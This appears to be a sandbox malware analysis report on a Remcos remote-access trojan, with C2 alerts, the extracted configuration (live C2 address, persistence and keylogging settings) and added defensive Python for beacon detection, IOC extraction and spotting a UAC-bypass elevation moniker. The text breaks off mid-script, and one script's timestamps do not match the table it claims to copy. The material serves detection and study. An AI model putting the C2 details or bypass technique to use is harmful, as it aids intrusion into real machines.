2024-12-17T20:40:23.143822+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50033 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:25.891579+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50034 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:28.628431+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50035 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:31.312218+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50036 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:34.145600+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50037 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:36.782135+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50038 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:39.486012+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50039 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:42.079096+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50040 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:44.655965+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50041 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:47.218645+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50043 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:49.767565+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50044 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:52.337409+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50045 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:54.879279+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50046 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:57.415006+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50047 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:40:59.906874+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50048 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:02.448953+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50049 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:04.969604+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50050 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:07.421853+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50051 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:09.929975+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50052 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:12.403413+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50053 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:14.832451+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50054 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:17.352648+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50055 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:19.750082+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50057 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:22.144892+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50058 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:24.517833+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50059 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:26.960949+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50060 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:29.321030+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50061 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:31.688833+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50062 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:34.018297+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50063 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:36.473112+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50064 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:38.785617+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50065 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:41.096857+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50066 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:43.391513+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50067 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:45.735941+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50068 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:48.065568+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50069 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:50.389077+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50070 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:52.656817+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50071 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:55.005009+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50072 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:57.272222+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50073 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:59.540967+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50074 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:01.786745+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50075 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:04.051787+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50076 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:06.517762+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50077 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:08.786445+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50078 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:11.000967+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50079 | 107.173.4.16 | 2560 | TCP
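Every alert in the Suricata table above is a fresh TCP connection (the source port climbs with each row) from 192.168.2.6 to 107.173.4.16:2560, spaced a near-constant two to three seconds apart, which is the check-in cadence a RAT with a fixed connect interval produces. The Python below is an added example, not part of the Joe Sandbox report: it groups alerts per (source, destination, port) flow, computes the gaps between consecutive alerts, and flags a flow as periodic when the gaps' coefficient of variation is small. The 107.173.4.16 timestamps are the first ten rows of the table; the 203.0.113.10:443 flow is constructed to look like ordinary browsing and serves as a non-periodic control. The 0.2 jitter threshold and the five-event minimum are my own assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev
from typing import Dict, List, Tuple

FlowKey = Tuple[str, str, int]  # (source IP, destination IP, destination port)

# (timestamp, src_ip, dst_ip, dst_port). The 107.173.4.16:2560 rows are the first ten
# alerts from the report's Suricata table; the 203.0.113.10:443 rows are constructed.
SAMPLE_ALERTS: List[Tuple[str, str, str, int]] = [
    ("2024-12-17T20:38:09.344301+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:12.444320+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:15.518949+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:18.610683+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:21.715391+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:24.782070+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:27.881882+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:30.956422+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:34.048077+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:37.143338+0100", "192.168.2.6", "107.173.4.16", 2560),
    ("2024-12-17T20:38:10.000000+0100", "192.168.2.6", "203.0.113.10", 443),
    ("2024-12-17T20:38:10.500000+0100", "192.168.2.6", "203.0.113.10", 443),
    ("2024-12-17T20:38:17.800000+0100", "192.168.2.6", "203.0.113.10", 443),
    ("2024-12-17T20:38:18.900000+0100", "192.168.2.6", "203.0.113.10", 443),
    ("2024-12-17T20:38:48.900000+0100", "192.168.2.6", "203.0.113.10", 443),
    ("2024-12-17T20:38:50.900000+0100", "192.168.2.6", "203.0.113.10", 443),
]


def parse_ts(value: str) -> datetime:
    """Parse Suricata's ISO-8601 timestamp with microseconds and a numeric UTC offset."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")


def intervals(timestamps: List[str]) -> List[float]:
    """Seconds between consecutive alerts, in chronological order."""
    ts = sorted(parse_ts(t) for t in timestamps)
    return [(later - earlier).total_seconds() for earlier, later in zip(ts, ts[1:])]


def beacon_profile(timestamps: List[str], max_cv: float = 0.2, min_events: int = 5) -> Dict[str, float]:
    """Summarise one flow's timing. 'periodic' is True when the coefficient of
    variation (stddev / mean) of the gaps is at or below max_cv, i.e. the client
    reconnects on a near-fixed schedule. Flows with too few events are left unflagged."""
    profile: Dict[str, float] = {"events": len(timestamps), "periodic": False}
    if len(timestamps) < min_events:
        return profile
    gaps = intervals(timestamps)
    mu = mean(gaps)
    cv = pstdev(gaps) / mu if mu > 0 else float("inf")
    profile.update(mean_s=mu, median_s=median(gaps), cv=cv, periodic=cv <= max_cv)
    return profile


def profile_flows(alerts: List[Tuple[str, str, str, int]]) -> Dict[FlowKey, Dict[str, float]]:
    """Group alerts by (src, dst, dport) and profile each flow separately."""
    by_flow: Dict[FlowKey, List[str]] = defaultdict(list)
    for ts, src, dst, dport in alerts:
        by_flow[(src, dst, dport)].append(ts)
    return {key: beacon_profile(ts_list) for key, ts_list in by_flow.items()}


if __name__ == "__main__":
    for (src, dst, dport), p in profile_flows(SAMPLE_ALERTS).items():
        flag = "PERIODIC" if p["periodic"] else "irregular"
        print(f"{src} -> {dst}:{dport}  events={p['events']}  {flag}  {p}")
```

On the sample the C2 flow reports a median gap of about 3.09 s with a coefficient of variation well under one percent, while the browsing control is far above the threshold. In production this runs over flow or alert logs rather than an IDS hit list, since the point is to catch beaconing to destinations no signature yet names; the same timing check also works on the ephemeral-port pattern alone when the payload is encrypted.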


              AV Detection

              barindex
Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Avira: detection malicious, Label: HEUR/AGEN.1305624
Source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos
  {
    "Host:Port:Password": ["107.173.4.16:2560:1"],
    "Assigned name": "elvis",
    "Connect interval": "1",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Install path": "Application path",
    "Copy file": "remcos.exe",
    "Startup value": "Disable",
    "Hide file": "Disable",
    "Mutex": "Rmc-T6WK9E",
    "Keylog flag": "0",
    "Keylog path": "Application path",
    "Keylog file": "logs.dat",
    "Keylog crypt": "Disable",
    "Hide keylog file": "Disable",
    "Screenshot flag": "Disable",
    "Screenshot time": "1",
    "Take Screenshot option": "Disable",
    "Take screenshot title": "",
    "Take screenshot time": "5",
    "Screenshot path": "AppData",
    "Screenshot file": "Screenshots",
    "Screenshot crypt": "Disable",
    "Mouse option": "Disable",
    "Delete file": "Disable",
    "Audio record time": "5",
    "Audio folder": "MicRecords",
    "Connect delay": "0",
    "Copy folder": "Remcos",
    "Keylog folder": "remcos"
  }
Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | ReversingLabs: Detection: 39%
Source: file.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_d76915b8-b
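The configuration the extractor recovered above is the most reusable artifact in this report. The following script is an added example for this page, not Joe Sandbox code: it takes the extracted fields (values copied from the extractor output) and turns them into hunting terms: the C2 host and port, the mutex, the autorun locations implied by the two "Setup ... Run" flags, and the file and folder names the RAT uses on disk. The page labels the third C2 field "Password"; the parser keeps that label and does not interpret it. The two registry paths are an assumption about what the HKCU/HKLM Run labels refer to.

```python
"""Turn the Remcos configuration extracted above into hunting artifacts.

Added example for this report, not Joe Sandbox code. REMCOS_CONFIG is copied
from the Malware Configuration Extractor output; RUN_KEYS is an assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Subset of the extractor output on this page (values copied, not constructed).
REMCOS_CONFIG: dict[str, object] = {
    "Host:Port:Password": ["107.173.4.16:2560:1"],
    "Assigned name": "elvis",
    "Connect interval": "1",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Copy file": "remcos.exe",
    "Copy folder": "Remcos",
    "Mutex": "Rmc-T6WK9E",
    "Keylog file": "logs.dat",
    "Keylog folder": "remcos",
    "Audio folder": "MicRecords",
}

# Assumption: the report's HKCU/HKLM "Run" labels refer to the standard autorun keys.
RUN_KEYS = {
    "Setup HKCU\\Run": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    "Setup HKLM\\Run": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
}

_C2_RE = re.compile(r"^(?P<host>[^:\s]+):(?P<port>\d{1,5}):(?P<third>.*)$")


@dataclass(frozen=True)
class C2Entry:
    host: str
    port: int
    third_field: str  # the page labels this 'Password'; kept verbatim


@dataclass
class RemcosIOCs:
    c2: list[C2Entry] = field(default_factory=list)
    mutex: str = ""
    run_keys: list[str] = field(default_factory=list)
    file_names: list[str] = field(default_factory=list)
    folder_names: list[str] = field(default_factory=list)
    connect_interval: int = 0


def parse_c2(entry: str) -> C2Entry:
    """Split one 'host:port:<third>' entry; reject malformed ports so a bad
    config line cannot silently become a wrong network IOC."""
    m = _C2_RE.match(entry)
    if not m:
        raise ValueError(f"unparseable C2 entry: {entry!r}")
    port = int(m["port"])
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range in {entry!r}")
    return C2Entry(m["host"], port, m["third"])


def build_iocs(cfg: dict[str, object]) -> RemcosIOCs:
    """Collect network, registry and file-system indicators from the config."""
    iocs = RemcosIOCs()
    for entry in cfg.get("Host:Port:Password", []):
        iocs.c2.append(parse_c2(str(entry)))
    iocs.mutex = str(cfg.get("Mutex", ""))
    iocs.connect_interval = int(cfg.get("Connect interval", 0) or 0)
    for key, path in RUN_KEYS.items():  # only the persistence the config enables
        if cfg.get(key) == "Enable":
            iocs.run_keys.append(path)
    for key in ("Copy file", "Keylog file"):
        if cfg.get(key):
            iocs.file_names.append(str(cfg[key]))
    for key in ("Copy folder", "Keylog folder", "Audio folder"):
        if cfg.get(key):
            iocs.folder_names.append(str(cfg[key]))
    return iocs


def hunt_terms(iocs: RemcosIOCs) -> list[str]:
    """Flat, de-duplicated list suitable for a SIEM 'contains' search."""
    terms = [f"{c.host}:{c.port}" for c in iocs.c2]
    terms.append(iocs.mutex)
    terms += iocs.run_keys + iocs.file_names + iocs.folder_names
    return sorted({t for t in terms if t})


if __name__ == "__main__":
    for term in hunt_terms(build_iocs(REMCOS_CONFIG)):
        print(term)
```

The mutex and the copy-file name are the cheapest host-side pivots; the Run-key paths only matter because both "Setup ... Run" flags are "Enable" in this configuration, which is why the builder checks the flag rather than emitting them unconditionally.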

              Exploits

              barindex
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              Privilege Escalation

              barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406764 _wcslen,CoGetObject
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0044D5E9 FindFirstFileExA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
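The only privilege-escalation evidence the report shows is the CoGetObject call at 12_2_00406764 together with the Yara rule for UAC bypass through CMSTP COM interfaces (T1218.003). That technique works by handing CoGetObject an elevation moniker of the form Elevation:Administrator!new:{CLSID} for an auto-elevating COM server; the moniker string itself is not printed on this page. The scanner below is an added example, not Joe Sandbox code or the Yara rule that fired: it searches an unpacked payload such as 12.2.MSBuild.exe.400000.0.unpack for any elevation moniker, in ASCII and UTF-16LE, and flags the CMSTPLUA CLSID. The CLSID and moniker format are taken from public COM elevation documentation, not from this report; SAMPLE_BLOB is constructed.

```python
"""Find COM elevation monikers (the CMSTPLUA UAC-bypass indicator) in a blob.

Added example for this report, not Joe Sandbox code. CMSTPLUA_CLSID and the
'Elevation:Administrator!new:' moniker format are public facts about the COM
elevation moniker, not values printed on this page. SAMPLE_BLOB is constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# CLSID of the CMSTPLUA COM server (ICMLuaUtil); public, not from this page.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

_PREFIX = b"Elevation:Administrator!new:"
# ASCII form: prefix followed by a braced 36-character GUID.
_ASCII_RE = re.compile(re.escape(_PREFIX) + rb"(\{[0-9A-Fa-f\-]{36}\})")
# UTF-16LE form: every ASCII byte is followed by a NUL, so match 38 (byte, NUL) pairs.
_UTF16_RE = re.compile(
    re.escape(_PREFIX.decode().encode("utf-16-le")) + rb"((?:[{}0-9A-Fa-f\-]\x00){38})"
)
_CLSID_RE = re.compile(r"^\{[0-9A-Fa-f-]{36}\}$")


@dataclass(frozen=True)
class MonikerHit:
    offset: int
    encoding: str
    clsid: str
    is_cmstplua: bool


def find_elevation_monikers(data: bytes) -> list[MonikerHit]:
    """Return every elevation moniker in the blob, sorted by offset."""
    hits: list[MonikerHit] = []
    for m in _ASCII_RE.finditer(data):
        clsid = m.group(1).decode("ascii").upper()
        hits.append(MonikerHit(m.start(), "ascii", clsid, clsid == CMSTPLUA_CLSID))
    for m in _UTF16_RE.finditer(data):
        clsid = m.group(1).decode("utf-16-le").upper()
        if _CLSID_RE.match(clsid):  # reject byte runs that only looked like a GUID
            hits.append(MonikerHit(m.start(), "utf-16le", clsid, clsid == CMSTPLUA_CLSID))
    return sorted(hits, key=lambda h: h.offset)


def imports_cogetobject(data: bytes) -> bool:
    """Cheap import-name check; a full triage would walk the PE import table."""
    return b"CoGetObject" in data


def triage(data: bytes) -> dict:
    """Combine both indicators: the moniker alone is only a string, the API
    alone is generic COM; together they reproduce what the Yara rule keys on."""
    hits = find_elevation_monikers(data)
    has_api = imports_cogetobject(data)
    return {
        "cogetobject": has_api,
        "monikers": hits,
        "cmstplua_bypass_indicators": has_api and any(h.is_cmstplua for h in hits),
    }


# Constructed stand-in for an unpacked payload: a fake header, an import-name
# region, the CMSTPLUA moniker as UTF-16LE, and an unrelated ASCII moniker.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"ole32.dll\x00CoGetObject\x00CoInitializeEx\x00"
    + ("Elevation:Administrator!new:" + CMSTPLUA_CLSID).encode("utf-16-le") + b"\x00\x00"
    + b"Elevation:Administrator!new:{00000000-0000-0000-0000-000000000000}\x00"
)

if __name__ == "__main__":
    for hit in find_elevation_monikers(SAMPLE_BLOB):
        print(f"{hit.offset:#08x} {hit.encoding:8} {hit.clsid} cmstplua={hit.is_cmstplua}")
```

Run it against the raw dump of the unpacked Remcos module rather than the packed .NET loader: the loader only carries the payload as an encrypted resource, so the string is not visible until the stage that MSBuild.exe executes has been dumped.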

              Networking

              barindex
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6 -> 107.173.4.16:2560 (89 separate TCP sessions, one JA3 alert each; client source ports in report order: 49716, 49734, 49727, 49760, 49771, 49778, 49795, 49801, 49807, 49819, 49787, 49825, 49713, 49847, 49711, 49856, 49876, 49897, 49842, 49905, 49742, 49915, 49930, 49862, 49920, 49945, 49953, 49937, 49960, 49983, 49998, 49882, 50020, 49754, 50026, 50036, 50037, 50038, 50035, 50046, 50039, 50044, 50052, 50051, 49836, 50043, 50068, 50063, 50048, 50050, 50049, 50074, 50045, 50010, 50073, 50072, 50053, 50032, 50071, 50079, 50060, 50075, 50066, 50077, 50055, 50057, 50062, 50047, 49969, 50069, 50054, 49992, 49977, 50076, 50040, 50065, 50061, 50004, 50078, 50034, 49891, 50033, 49868, 50067, 50064, 50070, 50058, 50041, 50059)
Source: Malware configuration extractor | IPs: 107.173.4.16
Source: global traffic | TCP traffic: 192.168.2.6:49711 -> 107.173.4.16:2560
Source: Joe Sandbox View | IP Address: 107.173.4.16
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: unknown | TCP traffic detected without corresponding DNS query (50 events, in report order): 40.126.53.19 (2), 20.198.119.143 (7), 173.222.162.64 (3), 107.173.4.16 (8), 173.222.162.64 (3), 107.173.4.16 (5), 173.222.162.64 (1), 107.173.4.16 (21). The 34 events to 107.173.4.16 are expected to have no lookup: the extracted configuration carries the C2 as an IP literal, not a hostname.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004260F7 recv
Source: MSBuild.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: file.exe, 00000000.00000002.2168087268.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, DcBNSgyxoJFip.exe, 00000009.00000002.2200731306.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://api.libertyreserve.com/beta/xml/
Source: file.exe, DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c
Source: file.exe, DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c
Source: DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
Source: DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
Source: DcBNSgyxoJFip.exe.0.dr | String found in binary or memory: https://sci.libertyreserve.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 (client ports 49674, 49706, 49673, 49672, 49705, 49703, 49701 -> 443; responses 443 -> 49706, 49705, 49703, 49701)
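The network section above is dominated by one Suricata signature firing on many short-lived TCP sessions from 192.168.2.6 to 107.173.4.16:2560, each from a fresh ephemeral port. That pattern (reconnect loop to a single host:port, consistent with the "Connect interval": "1" in the extracted configuration) is easier to see in a summary than in the raw rows. The script below is an added example, not Joe Sandbox code: it parses lines in the format of the "Suricata IDS" rows on this page, groups them by destination and signature, counts distinct client ports per destination, and flags destinations with enough distinct sessions to look like beaconing. SAMPLE_LINES are constructed in that format using ports from the page plus one unrelated alert with a made-up local-rules SID; the prefix before "Suricata IDS:" is ignored so the parser accepts the rows as extracted.

```python
"""Summarise Joe Sandbox 'Suricata IDS' rows into per-destination C2 statistics.

Added example for this report, not Joe Sandbox code. SAMPLE_LINES are
constructed in the row format used on this page; SID 1000001 is a made-up
local-rules ID used only to show that unrelated alerts are kept separate.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Iterable

SAMPLE_LINES = """\
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49716 -> 107.173.4.16:2560
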